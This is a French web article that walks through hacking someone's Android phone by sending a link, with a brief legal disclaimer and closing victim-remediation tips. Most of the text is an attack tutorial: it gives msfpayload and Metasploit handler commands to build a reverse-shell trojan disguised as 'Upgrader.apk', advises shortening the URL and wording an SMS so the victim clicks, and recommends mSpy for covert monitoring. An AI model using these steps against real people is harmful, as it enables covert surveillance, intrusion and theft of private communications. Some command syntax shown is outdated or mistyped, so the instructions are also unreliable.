Beaucoup de sites vous promettent aujourd’hui de vous montrer comme il est possible de pirater un téléphone Android simplement en lui envoyant un lien. La plupart de ces sites sont toutefois frauduleux et vous feront télécharger des applications : cela fait partie d’une stratégie marketing bien rodée. Nous vous montrons dans cet article comment vous pouvez, assez simplement, accéder au téléphone de quelqu’un en lui envoyant un lien, et donc vous protéger de cette pratique.

Rappel de la loi

Notez que cet article est purement informatif : si les logiciels nommés sont légaux, le fait de les utiliser pour voler des informations sur un téléphone ne l’est en revanche pas ! L’article 226-15 du Code pénal le rappelle : “le fait, commis de mauvaise foi, d’ouvrir (…) des correspondances arrivées ou non à destination et adressées à des tiers, ou d’en prendre frauduleusement connaissance, est puni d’un an d’emprisonnement et de 45 000 euros d’amende. Est puni des mêmes peines le fait, commis de mauvaise foi, d’intercepter (…) des correspondances émises, transmises ou reçues par la voie des télécommunications ou de procéder à l’installation d’appareils conçus pour réaliser de telles interceptions”.

En résumé

  • Tout d’abord il est nécessaire de créer un lien en utilisant le bon logiciel. C’est ce lien qui dirige la victime vers une application ou un site Web.
  • Il sera ensuite nécessaire d’envoyer le lien à la victime par SMS. L’URL est toujours raccourcie pour empêcher la victime de voir le lien réel.
  • Le message doit être écrit de manière à inciter la victime à cliquer immédiatement sur le lien.
  • Une fois que la victime a cliqué sur le lien, son téléphone devient accessible et les informations qu’il contient sont piratables.

Notez que sans être très dur, ce processus demande quelques connaissances techniques.

Les bons outils

Si vous avez accès au téléphone, vous pouvez installer le logiciel mSpy, qui vous permettra de contrôler le smartphone à distance.

Créer un lien requiert un bon logiciel. La meilleure solution pour cela est d’utiliser le logiciel Metasploit, un outil pour le développement et l’exécution d’exploits qui permet de réaliser des audits en sécurité, de tester et développer ses propres exploits.

Pour le piratage proprement dit, il faut utiliser Kali Linux, une distribution GNU/Linux basée sur Debian qui regroupe les outils nécessaires aux tests de sécurité des systèmes informatiques : sniffing, test d’intrusion, reverse engineering, piratages de mots de passe, recherches de vulnérabilités. Cette suite est relativement facile à utiliser, même par les débutants.

Le processus par étapes

Voyons maintenant, point par point, comment se déroule le piratage proprement dit :

  • Commencez par télécharger puis installer Kali Linux sur votre ordinateur, ouvrez le logiciel.
  • Créez un fichier Trojan.apk : il faut pour cela taper : “msfpayload android/meterpreter/reverse_tcp LHOST=192.123.0.5 R > /root/Upgrader.apk” sur le terminal.
  • Remplacez ensuite l’adresse IP LHOST par l’adresse IP de votre PC.
  • Inscrivez “msfconsole” sur le terminal pour ouvrir la console Metasploit.
  • Une fois la console Metasploit chargée, tapez “use exploit/multi/handler”.
  • Inscrivez ensuite “set payload android/meterpreter/reverse_tcp”
  • Inscrivez “set LHOST YIPA” puis remplacez YIPA par votre adresse IP.
  • Démarrez le listener que vous avez créé en tapant “exploiter”.
  • Déplacez enfin l’application “Upgrader.apk” sur votre téléphone Android.

Il ne reste plus qu’à envoyer le lien a une victime et d’attendre qu’elle l’installe sur son smartphone. Toutes les informations du téléphone sont accessibles au hacker.

Alternativement, il est possible d’envoyer un lien qui dirigera la victime vers n’importe quel site Web. Beaucoup de sites Web assez bien conçus n’existent que dans cet unique but.

Que faire si votre téléphone a été piraté ?

Si vous avez cliqué sur ce genre de lien et qu’un hacker a infiltré votre téléphone, il est important de suivre les étapes suivantes :

  • Alerter tout d’abord vos contacts que votre téléphone a été piraté. De cette façon, ils éviteront de cliquer sur tout lien suspect qui pourrait émaner de votre téléphone. Le virus Flubot, par exemple, se propage de cette manière.
  • Désinstaller ensuite toutes les applications suspectes de votre smartphone.
  • Activer un logiciel antimalware afin de détecter la source du problème.

En dernier ressort, désinstaller et réinstaller votre téléphone, même si cela implique l’effacement de vos données et fichiers personnels. Dans ce cas n’oubliez pas de changer vos mots de passe compromis pendant l’attaque.